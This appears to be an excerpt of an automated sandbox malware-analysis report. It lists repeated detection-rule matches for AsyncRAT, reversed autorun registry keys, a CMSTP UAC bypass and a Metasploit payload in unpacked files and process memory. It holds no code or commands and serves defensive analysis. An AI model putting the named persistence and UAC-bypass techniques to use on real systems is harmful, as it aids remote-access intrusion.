                                Source: 34.3.AchillesGuard.com.3cc3670.2.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
                                Source: 34.3.AchillesGuard.com.3cc3670.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 34.3.AchillesGuard.com.3cc3670.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 34.3.AchillesGuard.com.3c531d8.0.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
                                Source: 34.3.AchillesGuard.com.3c531d8.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 34.3.AchillesGuard.com.3c531d8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 29.3.Macromedia.com.499e4c0.2.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
                                Source: 29.3.Macromedia.com.499e4c0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 29.3.Macromedia.com.499e4c0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 34.3.AchillesGuard.com.1388a80.3.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
                                Source: 34.3.AchillesGuard.com.1388a80.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 34.3.AchillesGuard.com.1388a80.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 29.3.Macromedia.com.499e4c0.3.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
                                Source: 29.3.Macromedia.com.499e4c0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 29.3.Macromedia.com.499e4c0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 29.3.Macromedia.com.4985ad0.1.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
                                Source: 29.3.Macromedia.com.4985ad0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 29.3.Macromedia.com.4985ad0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 34.3.AchillesGuard.com.3cc3670.2.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
                                Source: 34.3.AchillesGuard.com.3cc3670.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 34.3.AchillesGuard.com.3cc3670.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 34.3.AchillesGuard.com.3cc3670.1.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
                                Source: 34.3.AchillesGuard.com.3cc3670.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 34.3.AchillesGuard.com.3cc3670.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 49.2.MSBuild.exe.1400000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
                                Source: 49.2.MSBuild.exe.1400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 49.2.MSBuild.exe.1400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 34.3.AchillesGuard.com.3cc3670.1.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
                                Source: 34.3.AchillesGuard.com.3cc3670.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 34.3.AchillesGuard.com.3cc3670.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 50.2.c7f37422c5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                                Source: 16.2.935372fb1f.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                                Source: 0000001D.00000003.22787007755.000000000499E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 0000001D.00000003.22787007755.000000000499E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 0000001D.00000003.22786943881.00000000048FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 0000001D.00000003.22728218550.000000000497A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 0000001D.00000003.22728218550.000000000497A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 0000001D.00000003.22728551295.0000000004985000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 0000001D.00000003.22728551295.0000000004985000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 0000001D.00000003.22790546318.00000000049C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 00000022.00000003.22738889698.0000000003C4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 00000022.00000003.22738889698.0000000003C4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 0000001D.00000003.22787546897.00000000049C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 0000001D.00000003.22787323796.0000000001C6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 0000001D.00000003.22787323796.0000000001C6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 0000001D.00000003.22730365513.00000000048FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 0000001D.00000003.22730365513.00000000048FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 0000001D.00000002.22807614059.00000000049C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 0000001D.00000003.22730600015.0000000004994000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 0000001D.00000003.22730600015.0000000004994000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 0000001D.00000003.22728218550.000000000490B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 0000001D.00000003.22728218550.000000000490B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 0000001D.00000003.22787007755.0000000004986000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 0000001D.00000003.22787007755.0000000004986000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 00000022.00000003.22795694035.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 00000022.00000003.22739051213.0000000001389000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 00000022.00000003.22739051213.0000000001389000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 00000022.00000003.22795694035.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 00000022.00000003.22795694035.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 00000023.00000002.22887398976.000000000A400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
                                Source: 00000022.00000003.22799081360.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                 Source: 00000022.00000003.22799081360.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                 Source: 00000022.00000003.22795694035.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                 Source: 0000001D.00000003.22787007755.00000000049BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                 Source: 0000001D.00000003.22730431193.00000000049AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                 Source: 0000001D.00000003.22730431193.00000000049AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                 Source: 00000022.00000003.22738889698.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                 Source: 00000022.00000003.22738889698.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                 Source: 0000001D.00000003.22728329557.0000000004991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                 Source: 0000001D.00000003.22728329557.0000000004991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                 Source: 00000022.00000003.22739207245.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                 Source: 00000022.00000003.22739207245.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                 Source: 0000001D.00000003.22787007755.00000000049AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                 Source: 00000022.00000003.22739051213.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                 Source: 00000022.00000003.22739051213.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                 Source: 00000031.00000002.22834742123.0000000001402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                 Source: 00000022.00000003.22799002107.0000000001389000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                 Source: 00000022.00000003.22799002107.0000000001389000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                 Source: Process Memory Space: Macromedia.com PID: 3540, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                 Source: Process Memory Space: AchillesGuard.com PID: 2308, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                 Source: Process Memory Space: MSBuild.exe PID: 1884, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                 Source: Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE.6.dr | Static PE information: Section: rtrxnzik ZLIB complexity 0.9944343498734366
